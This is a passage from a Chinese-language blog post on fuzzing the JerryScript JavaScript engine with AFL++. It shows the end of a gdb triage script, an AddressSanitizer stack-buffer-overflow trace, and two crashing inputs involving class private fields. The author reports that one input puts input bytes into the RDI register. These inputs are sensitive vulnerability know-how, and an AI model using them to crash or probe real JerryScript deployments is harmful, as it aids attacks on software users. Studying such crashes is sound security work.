            print(f"     -> pattern '{PATTERN}' FOUND in backtrace/output. Not saving.")
        else:
            dest = install_file(infile)
            summary["saved"] += 1
            print(f"     -> pattern '{PATTERN}' NOT found. Saved to:", dest)
    else:
        summary["no_crash"] += 1
        print("  -> No crash detected. Log:", logfile)

    # Attempt to kill inferior if still running so we can restart cleanly next time
    try:
        gdb.execute("kill", to_string=True)
    except Exception:
        # ignore; keep going
        pass

# Final summary
print("\nDone.")
print("Summary:")
for k, v in summary.items():
    print(f"  {k}: {v}")
print("Logs:", LOG_DIR)
print("Valid candidates:", VALID_DIR)

# End of gdb_run.py

经过筛选后,我发现了一个很有意思的崩溃:

$ ./jerry-asan /storage/jsfuzz/valid/id:000005,sig:11,src:005743,time:469380,execs:12877861,op:havo
c,rep:4
=================================================================
==1365920==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7b6b9b700098 at pc 0x558aff052c4d bp 0x7ffcb9f80e60 sp 0x7ffcb9f80e50
READ of size 1 at 0x7b6b9b700098 thread T0
    #0 0x558aff052c4c in scanner_create_variables (/storage/jsfuzz/jerry-asan+0x78c4c) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #1 0x558aff0551bc in parser_parse_function_arguments.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7b1bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #2 0x558aff0585c8 in parser_parse_function (/storage/jsfuzz/jerry-asan+0x7e5c8) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #3 0x558aff0a26bc in lexer_construct_function_object (/storage/jsfuzz/jerry-asan+0xc86bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #4 0x558aff0a6a77 in parser_parse_class (/storage/jsfuzz/jerry-asan+0xcca77) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #5 0x558aff0b6198 in parser_parse_statements (/storage/jsfuzz/jerry-asan+0xdc198) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #6 0x558aff057d49 in parser_parse_source.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7dd49) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #7 0x558aff008764 in jerry_parse_common.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x2e764) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #8 0x558aff0bf0bc in jerryx_source_parse_script (/storage/jsfuzz/jerry-asan+0xe50bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #9 0x558afeff6be3 in main (/storage/jsfuzz/jerry-asan+0x1cbe3) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #10 0x7f6b9da27674  (/usr/lib/libc.so.6+0x27674) (BuildId: 4fe011c94a88e8aeb6f2201b9eb369f42b4a1e9e)
    #11 0x7f6b9da27728 in __libc_start_main (/usr/lib/libc.so.6+0x27728) (BuildId: 4fe011c94a88e8aeb6f2201b9eb369f42b4a1e9e)
    #12 0x558afeff72e4 in _start (/storage/jsfuzz/jerry-asan+0x1d2e4) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)

Address 0x7b6b9b700098 is located in stack of thread T0 at offset 152 in frame
    #0 0x558aff055ffe in parser_parse_source.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7bffe) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)

  This frame has 6 object(s):
    [32, 33) 'flags' (line 2041)
    [48, 49) 'flags' (line 2063)
    [64, 80) 'branch' (line 2253)
    [96, 112) 'literal'
    [128, 152) 'scanner_info_end' (line 2115) <== Memory access at offset 152 overflows this variable
    [192, 792) 'context' (line 1988)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/storage/jsfuzz/jerry-asan+0x78c4c) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b) in scanner_create_variables
Shadow bytes around the buggy address:
  0x7b6b9b6ffe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6ffe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6fff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6fff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700000: f1 f1 f1 f1 01 f2 01 f2 00 00 f2 f2 f8 f8 f2 f2
=>0x7b6b9b700080: 00 00 00[f2]f2 f2 f2 f2 00 00 00 00 00 00 00 00
  0x7b6b9b700100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700300: 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==1365920==ABORTING

这个输入是:

class MyError extends Error {7667111111111111111;;;;;;;static
 { throwased = true;
  d = trsert.s}.defeuse(resourcd = true;
 new MyError(); });
stack.defer(function () {});
assert.throws(MyError, functction (# {
 Csu 12), .defer(function41024448kTtrspose()&
});

还有一个输入会使得用于寄存器间接寻址的寄存器 RDI 地址值变为 RDI 0x646573610a20650a ('\ne \nased'),RDI 内容是输入本身的一部分。不过很有意思的是它并不会触发 Address Sanitizer。说明 ASAN 很可能会改变某些调用栈帧的内存布局。(我手动 trim 了一下,不然这个输入真的又长又难看。)

class MyE{7667;;667;;sta;7;;667;;s;;#;statTtra;sta;7;;667;;;;;;;;s;;#;statTtra;;';s;;#at;#;statTtra;;';s;;#atTtra;;#;;sta;;;
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
ase
6
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
ased6671;
6
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
as}}}}|}}}Of(}}|}csleO}}}}|}}}Of}}|}02000(1167E0Y.u(3}}}}}}}}}PisleO}}}}|}}}Of}}|}02000(1167E000002000(11676cY.u(Pisle}}}}PisleO}}}}|}}}OfInfinityaa, new .u9PisleOaaaaa!pa}}}}}}PisleO}}}}|}}}Of

另外有很多与它相似的 crash inputs,可以很明显发现 JerryScript 对于 JS 类私有字段名的处理有很大问题。

总结

其实这是一次没什么意义的 fuzzing,fuzz 类似编译器的软件应该使用结构化的 fuzzer,而不是 AFL++ 这样基本依靠字节随机变异的 fuzzer,不然连语法检查都过不了很难进一步挖掘漏洞。之后我可能再尝试一下 fuzzilli,或者考虑自己手写一个 fuzzer(画大饼 ing)。

最近初入真实世界的二进制漏洞利用,看到了太多 AI 伪造 exploits 和毫无意义的“高危”CVE。各种漏洞挖掘有高到令人振奋的 bug bounty,但很少有组织愿意奖励 bug patches。这是否是安全研究与软件开发之间的脱节?(现实是许多开发者都反感这些夸张甚至虚假的漏洞报告。)